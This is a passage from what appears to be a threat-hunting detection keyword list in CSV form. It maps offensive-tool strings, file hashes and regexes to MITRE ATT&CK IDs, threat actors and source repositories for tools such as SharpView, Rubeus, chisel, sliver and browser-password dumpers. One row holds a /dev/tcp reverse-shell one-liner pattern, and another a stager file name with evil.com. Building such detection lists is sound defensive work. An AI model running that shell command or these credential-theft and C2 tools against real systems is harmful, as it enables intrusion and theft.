"*>SharpView<*",".{0,1000}\>SharpView\<.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#companyname","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","20580"
"*>SharpView<*",".{0,1000}\>SharpView\<.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","#productname","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","20581"
"*>SharpView<*",".{0,1000}\>SharpView\<.{0,1000}","offensive_tool_keyword","SharpView","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20582"
"*>SharpWeb<*",".{0,1000}\>SharpWeb\<.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#productname","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","20583"
"*>SharpWMI<*",".{0,1000}\>SharpWMI\<.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#companyname","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","20584"
"*>SharpZeroLogon<*",".{0,1000}\>SharpZeroLogon\<.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","0","#productname","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","20585"
"*>Shock.exe<*",".{0,1000}\>Shock\.exe\<.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#originalfilename","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","20586"
"*>SniffPass<*",".{0,1000}\>SniffPass\<.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20588"
"*>TakeOwnershipServiceModificationVariant<*",".{0,1000}\>TakeOwnershipServiceModificationVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20597"
"*>TcbS4uImpersonationVariant<*",".{0,1000}\>TcbS4uImpersonationVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20598"
"*>TeamFiltration.dll<*",".{0,1000}\>TeamFiltration\.dll\<.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","20601"
"*>TokenStealing<*",".{0,1000}\>TokenStealing\<.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20604"
"*>Tor2web Error: *",".{0,1000}\>Tor2web\sError\:\s.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","20605"
"*>Trick.exe<*",".{0,1000}\>Trick\.exe\<.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#originalfilename","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","20606"
"*>UACBypassedService<*",".{0,1000}\>UACBypassedService\<.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","20607"
"*>Upload-OneDrive<*",".{0,1000}\>Upload\-OneDrive\<.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","#productname","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","20609"
"*>User32LogonProcesss<*",".{0,1000}User32LogonProcesss.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://x.com/_RastaMouse/status/1747636529613197757","1","0","N/A","typo in the process name used when calling LsaRegisterLogonProcess","10","10","N/A","N/A","N/A","N/A","20610"
"*>UserRightsUtil<*",".{0,1000}\>UserRightsUtil\<.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20611"
"*>VeeamBackupCreds<*",".{0,1000}\>VeeamBackupCreds\<.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","20612"
"*>VNCPassView<*",".{0,1000}\>VNCPassView\<.{0,1000}","offensive_tool_keyword","VNCPassView","recover the passwords stored by the VNC tool","T1003 - T1555 - T1081","TA0006 - TA0007","N/A","GoGoogle - 8BASE","Credential Access","https://www.nirsoft.net/utils/vnc_password.html","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20613"
"*>Web Browser Password Viewer<*",".{0,1000}\>Web\sBrowser\sPassword\sViewer\<.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","#Description","N/A","10","10","N/A","N/A","N/A","N/A","20614"
"*>WebBrowserPassView<*",".{0,1000}\>WebBrowserPassView\<.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20615"
"*>Welcome to BloodHound?s documentation!<*",".{0,1000}\>Welcome\sto\sBloodHound?s\sdocumentation!\<.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20617"
"*>WfpTokenDup<*",".{0,1000}\>WfpTokenDup\<.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20619"
"*>winexesvc<*",".{0,1000}\>winexesvc\<.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#servicename","N/A","8","8","N/A","N/A","N/A","N/A","20620"
"*>WinPwnage<*",".{0,1000}\>WinPwnage\<.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#servicename","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","20621"
"*>Wireless Key View<*",".{0,1000}\>Wireless\sKey\sView\<.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","0","#productname","N/A","7","10","N/A","N/A","N/A","N/A","20625"
"*0.0.0.0:2222*",".{0,1000}0\.0\.0\.0\:2222.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","20628"
"*0.0.0.0:23487*",".{0,1000}0\.0\.0\.0\:23487.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","20629"
"*0.0.0.0:4444*",".{0,1000}0\.0\.0\.0\:4444.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","20630"
"*0.0.0.0:4445*",".{0,1000}0\.0\.0\.0\:4445.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","20631"
"*0.0.0.0:53531*",".{0,1000}0\.0\.0\.0\:53531.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","N/A","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","20632"
"*0_evil.com_4444.exe*",".{0,1000}0_evil\.com_4444\.exe.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","1","N/A","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","20633"
"*0<&196;exec 196<>/dev/tcp/*/*; sh <&196 >&196 2>&196*",".{0,1000}0\<\&196\;exec\s196\<\>\/dev\/tcp\/.{0,1000}\/.{0,1000}\;\ssh\s\<\&196\s\>\&196\s2\>\&196.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","20634"
"*00_create_all_modules_test*",".{0,1000}00_create_all_modules_test.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20636"
"*00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64*",".{0,1000}00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#jarm","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","20637"
"*00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01*",".{0,1000}00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","20638"
"*00015f0ed60527ea65a612a07f73a3b8e3367eac36a94a21a73667e4a83a930b*",".{0,1000}00015f0ed60527ea65a612a07f73a3b8e3367eac36a94a21a73667e4a83a930b.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","20639"
"*000417262bbfa790d2c3a9f66236dc996b8079c4eb05240301d5de17e5cf6749*",".{0,1000}000417262bbfa790d2c3a9f66236dc996b8079c4eb05240301d5de17e5cf6749.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","20640"
"*000f59e092127362057a472411b5395360cfbff686077e7741fd03ea22e12516*",".{0,1000}000f59e092127362057a472411b5395360cfbff686077e7741fd03ea22e12516.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20643"
"*001f68ac4e3ffa91b0e787586bb8382aeeb8300da5548a8802417ee6a38ff880*",".{0,1000}001f68ac4e3ffa91b0e787586bb8382aeeb8300da5548a8802417ee6a38ff880.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","20644"
"*002cb66d300bfb43557d4a2857db4aa75260a07feee6ec53375d0cfb6161e2bd*",".{0,1000}002cb66d300bfb43557d4a2857db4aa75260a07feee6ec53375d0cfb6161e2bd.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","20645"
"*002fa7c3b308536f94ff10852afcfbb0285608d259a43277e69751ab7db48e04*",".{0,1000}002fa7c3b308536f94ff10852afcfbb0285608d259a43277e69751ab7db48e04.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","#filehash","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","20646"
"*0031268c9cdcadd2f9c9c0b7655ba40ebbca9f506cea829cb0ad0a96cc51022d*",".{0,1000}0031268c9cdcadd2f9c9c0b7655ba40ebbca9f506cea829cb0ad0a96cc51022d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20647"
"*0033346a10079dc04814e00f7717d40f104b309c5b8a0a8956fd871e305b8ae4*",".{0,1000}0033346a10079dc04814e00f7717d40f104b309c5b8a0a8956fd871e305b8ae4.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","20648"
"*0037e201d072aabd5bf4f22b6c9eb7f780d5007616dd130e8ffcdbd8d491c509*",".{0,1000}0037e201d072aabd5bf4f22b6c9eb7f780d5007616dd130e8ffcdbd8d491c509.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","20649"
"*00393218120b164c3069439284c49edd5a99be83482ed9149ce9af0e8026e61a*",".{0,1000}00393218120b164c3069439284c49edd5a99be83482ed9149ce9af0e8026e61a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20650"
"*004126d3014ab8a47172a1b7b0c88673283f9f245e1ce550846ef71bcac84524*",".{0,1000}004126d3014ab8a47172a1b7b0c88673283f9f245e1ce550846ef71bcac84524.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20652"
"*0044dbbe7f768c5b5464cca3fc0ace9850b2b41b628cb469a8173578f1d6335f*",".{0,1000}0044dbbe7f768c5b5464cca3fc0ace9850b2b41b628cb469a8173578f1d6335f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20654"
"*004b28244f398a619fe7d668f5ab925210e8a720c82344ae2f5acefaff30672f*",".{0,1000}004b28244f398a619fe7d668f5ab925210e8a720c82344ae2f5acefaff30672f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20655"
"*005b0d233056c44a7c6a57a078d00bc23b07d0f643a23ead7267be2d11a23f2a*",".{0,1000}005b0d233056c44a7c6a57a078d00bc23b07d0f643a23ead7267be2d11a23f2a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20657"
"*005dff69ec258cc35c2a45f0103570c28895b910e4f987af28daa7c5b7c22926*",".{0,1000}005dff69ec258cc35c2a45f0103570c28895b910e4f987af28daa7c5b7c22926.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20658"
"*00630066-0B43-474E-A93B-417CF1A65195*",".{0,1000}00630066\-0B43\-474E\-A93B\-417CF1A65195.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","#GUIDproject","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","20660"
"*006ace1aaf8ef3027f96f25e3408b9a95c11bc2009288e570de2c013daaaea32*",".{0,1000}006ace1aaf8ef3027f96f25e3408b9a95c11bc2009288e570de2c013daaaea32.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","20661"
"*006ad795269259c08e5b8e1816e05a4bbb52c97997ff238180afbc53365d3428*",".{0,1000}006ad795269259c08e5b8e1816e05a4bbb52c97997ff238180afbc53365d3428.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","20662"
